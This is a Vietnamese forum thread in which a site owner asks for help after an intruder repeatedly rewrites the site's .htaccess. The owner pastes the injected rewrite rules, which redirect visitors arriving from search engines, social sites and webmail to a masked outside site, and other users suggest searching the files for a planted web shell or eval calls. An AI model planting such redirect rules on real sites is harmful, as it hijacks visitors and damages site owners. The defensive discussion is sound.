PDA

View Full Version : [MU] Giúp web em bi hack file htacess



minhdlu
27-08-14, 10:40 PM
các bác nao biết cho em hỏi 1 ti
tình hình là web em gõ vào từ chuyển sang 1 trang khác
em biết là file htaccess bị thay đổi em chuyển lại code củ thì vào site bình thường
nhưng được vài giờ vào lại thì lại bi thay đổi tiếp
đây là code nó đưa vào


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|linkedin |flickr|filesearch|yell|openstat|metabot|gigablast |entireweb|amfibi|dmoz|yippy|walhello|webcrawler|j ayde|findwhat|teoma|euroseek|wisenut|about|thunder stone|ixquick|terra|lookle|metaeureka|searchspot|s lider|topseven|allthesites|libero|clickey|galaxy|b rainysearch|pocketflier|verygoodsearch|bellnet|fre enet|fireball|flemiro|suchbot|acoon|devaro|fastbot |netzindex|abacho|allesklar|suchnase|schnellsuche| sharelook|sucharchiv|suchbiene|suchmaschine|infosp ace).(.*)
RewriteRule ^(.*)$ <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> [R=301,L]
RewriteCond %{<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>} ^.*(web|websuche|witch|wolong|oekoportal|freenet|a rcor|alexana|tiscali|kataweb|voila|sfr|startpagina |kpnvandaag|ilse|wanadoo|telfort|hispavista|passag en|spray|eniro|telia|bluewin|sympatico|nlsearch|at search|klammeraffe|sharelook|suchknecht|ebay|abizd irectory|alltheuk|bhanvad|daffodil|click4choice|ex alead|findelio|gasta|gimpsy|globalsearchdirectory| hotfrog|jobrapido|kingdomseek|mojeek|searchers|sim plyhired|splut|thisisouryear|ukkey|uwe|friendsreun ited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala| limier|express|****ireland|browseireland|finditire land|iesearch|kompass|startsiden|confex|finnalle|g ulesider|keyweb|finnfirma|kvasir|savio|sol|startsi den|allpages|america|botw|chapu|claymont|clickz|cl ush|ehow|findhow|icq|westaustraliaonline).(.*)
RewriteRule ^(.*)$ <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> [R=301,L]
RewriteCond %{<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>} ^.*(inbox|spam|mail).(.*)
RewriteRule ^(.*)$ <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> [R=301,L]
</IfModule>
ErrorDocument 404 <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

không biêt lỗi này là do em config gà nên bị hack hay do bảo mật của host kém vậy
hjc. Có pro nao giúp em với

vd_tt
27-08-14, 10:58 PM
Read-only

Dù ai đi ngược về xuôi nhớ ngày giỗ tổ ... ? (gợi ý câu trả lời: mung 10 thang 3)

BMK
27-08-14, 11:03 PM
tình hình là trong web bạn có shell hãy check shell xem nó nằm ở đâu nhé vì chỉ có shell mới write được htaccess chứ không đương nhiên nó tự đổi đâu hoặc là trong code có 1 function shell tự đổi htaccess.

dùng notepad++ open tất cả file trong thư mục web và find từ khóa htaccess nếu có thì hãy phân tích và vô hiệu hóa nó còn không thấy thì find từ khóa eval và các function có thể thay đổi hệ thống trên google có tất nhé chúc bạn vượt qua !

minhdlu
27-08-14, 11:11 PM
Read-only

Dù ai đi ngược về xuôi nhớ ngày giỗ tổ ... ? (gợi ý câu trả lời: mung 10 thang 3)

mình để mod là 444 rồi, mà tí nữa vào lại nó lại tự chuyển thành 644 luôn


tình hình là trong web bạn có shell hãy check shell xem nó nằm ở đâu nhé vì chỉ có shell mới write được htaccess chứ không đương nhiên nó tự đổi đâu hoặc là trong code có 1 function shell tự đổi htaccess.

dùng notepad++ open tất cả file trong thư mục web và find từ khóa htaccess nếu có thì hãy phân tích và vô hiệu hóa nó còn không thấy thì find từ khóa eval và các function có thể thay đổi hệ thống trên google có tất nhé chúc bạn vượt qua !
để minh thử xem sao

minhdlu
28-08-14, 03:33 PM
hix úp lên cho ai biết giúp mình với, cách trên không dc rồi

OsinLove
28-08-14, 03:44 PM
hix úp lên cho ai biết giúp mình với, cách trên không dc rồi

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Mình sẽ fix giúp bạn

lequangvu
28-08-14, 04:10 PM
Cái vụ file bảo mật web bị edit nữa thì chắc chắn do host đểu bảo mật kém, khi dùng file .htaccess để bảo mật thì nên cho câu lệnh bảo mật luôn file đấy ở trong chính nó, chmod cả thư mục chính của web như www để kiểm tra toàn bộ trước khi cho hoạt động lại, có thể bị shell hoặc lỗ hổng sql